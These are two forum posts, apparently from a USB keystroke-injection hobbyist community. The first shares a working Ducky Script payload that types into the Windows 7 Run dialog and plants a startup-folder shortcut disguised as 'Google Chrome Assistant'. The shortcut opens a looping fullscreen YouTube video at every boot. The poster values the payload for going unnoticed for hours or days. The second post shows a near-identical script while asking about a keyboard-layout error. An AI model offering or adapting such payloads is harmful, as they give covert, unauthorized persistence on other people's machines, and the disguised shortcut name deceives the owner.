Jump to content

Morrolan

Active Members
  • Posts

    4
  • Joined

  • Last visited

Posts posted by Morrolan

  1. Hey all,

    My first payload is done, and whilst simple, it is good as it will only really be noticed many hours or days after injection.

    It creates a shortcut in the Windows 7 startup folder called "Google Chrome Assistant".

    When the PC boots, it opens the youtube video in the shortcut fullscreen, looping. At the moment it is Nyancat, but if you are using your own video, remember to change 'watch' in the url to 'watch_popup' and add '&loop=1' to the end of the URL for infinity goodness.

    REM Title: Youtube Startup Folder Roller
    DELAY 1000
    GUI r
    DELAY 50
    STRING "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
    ENTER
    DELAY 100
    SHIFT F10
    DELAY 100
    STRING w
    DELAY 100
    STRING w
    ENTER
    DELAY 100
    STRING S
    ENTER
    DELAY 100
    STRING http://www.youtube.com/watch_popup?v=QH2-TGUlwu4&loop=1
    ENTER
    DELAY 100
    STRING Google Chrome Assistant
    ENTER
    DELAY 100
    ALT f
    DELAY 100
    STRING c
    

    Enjoy!

    Morrolan

  2. Hi all,

    When I try to enter directories I keep recieving an error.

    My script is as follows:

    DELAY 5000
    GUI r
    DELAY 50
    STRING "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
    ENTER
    DELAY 500
    SHIFT F10
    DELAY 200
    STRING w
    DELAY 200
    STRING w
    ENTER
    DELAY 200
    STRING S
    ENTER
    STRING http://www.youtube.com/watch_popup?v=WYqWbnoemJg&loop=1
    ENTER
    DELAY 1000
    STRING Youtube-roll
    ENTER
    

    The long delays are for debugging purposes.

    However, Windows 7 throws an error:

    Windows cannot find '@C:\Users\me#AppData#Roaming#Microsoft#Windows#Start'. Make sure you typed the name correctly, and then try again.

    I'm in the United Kingdom with a United Kingdom keyboard. However, my script appears to get interpreted into a US keyboard configuration?

    How can I change my keyboard/language/region?

    Kind Regards,

    Morrolan

×
×
  • Create New...